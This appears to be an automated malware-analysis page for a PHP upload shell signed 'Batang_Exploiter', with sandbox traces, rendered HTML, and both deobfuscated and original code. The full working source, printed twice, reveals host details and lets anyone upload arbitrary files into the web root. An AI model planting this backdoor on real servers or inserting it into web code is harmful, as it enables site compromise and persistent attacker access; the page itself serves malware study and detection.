PHP Malware Analysis
gelay12.php.php, logo12.php
md5: 6ebe7b34d823fd6553cc06f44b6712da
Jump to:
- Deobfuscated code (Read more)
- Execution traces (Read more)
- Generated HTML (Read more)
- Original Code (Read more)
Screenshot
Attributes
Environment
- php_uname (Deobfuscated, Original, Traces)
Files
- copy (Deobfuscated, Original)
Input
- _FILES (Deobfuscated, Original)
- _POST (Deobfuscated, Original)
Deobfuscated PHP code
<?php
echo "Priv8 Home Root@Batang_Exploiter<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\r\n <input type='file' name='idx_file'>\r\n <input type='submit' name='upload' value='upload'>\r\n </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
if (is_writable($root)) {
if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://" . $_SERVER['HTTP_HOST'] . "/admin/";
echo "sukses COk..!!!!! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "sukses upload <b>{$files}</b> di folder ini";
} else {
echo "gagal upload";
}
}
}Execution traces
data/traces/6ebe7b34d823fd6553cc06f44b6712da_trace-1676242514.9264.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 20:55:40.824182]
1 0 1 0.000145 393528
1 3 0 0.000223 398896 {main} 1 /var/www/html/uploads/logo12.php 0 0
2 4 0 0.000241 398896 php_uname 0 /var/www/html/uploads/logo12.php 3 0
2 4 1 0.000256 399008
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/logo12.php 8 $root = '/var/www/html'
1 A /var/www/html/uploads/logo12.php 9 $files = NULL
1 A /var/www/html/uploads/logo12.php 10 $dest = '/var/www/html/'
1 3 1 0.000332 398936
0.000358 314376
TRACE END [2023-02-12 20:55:40.824422]
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:37:07.212054]
1 0 1 0.000151 393576
1 3 0 0.000228 398944 {main} 1 /var/www/html/uploads/gelay12.php.php 0 0
2 4 0 0.000245 398944 php_uname 0 /var/www/html/uploads/gelay12.php.php 3 0
2 4 1 0.000260 399056
2 4 R 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1 A /var/www/html/uploads/gelay12.php.php 8 $root = '/var/www/html'
1 A /var/www/html/uploads/gelay12.php.php 9 $files = NULL
1 A /var/www/html/uploads/gelay12.php.php 10 $dest = '/var/www/html/'
1 3 1 0.000336 398984
0.000372 314400
TRACE END [2023-02-13 01:37:07.212305]
Generated HTML code
<html><head></head><body>Priv8 Home Root@Batang_Exploiter<br><b>Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</b><br><form method="post" enctype="multipart/form-data">
<input type="file" name="idx_file">
<input type="submit" name="upload" value="upload">
</form></body></html>Original PHP code
<?php
echo "Priv8 Home Root@Batang_Exploiter<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
<input type='file' name='idx_file'>
<input type='submit' name='upload' value='upload'>
</form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
if(is_writable($root)) {
if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
$web = "http://".$_SERVER['HTTP_HOST']."/admin/";
echo "sukses COk..!!!!! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
} else {
echo "gagal upload di document root.";
}
} else {
if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
echo "sukses upload <b>$files</b> di folder ini";
} else {
echo "gagal upload";
}
}
}
?>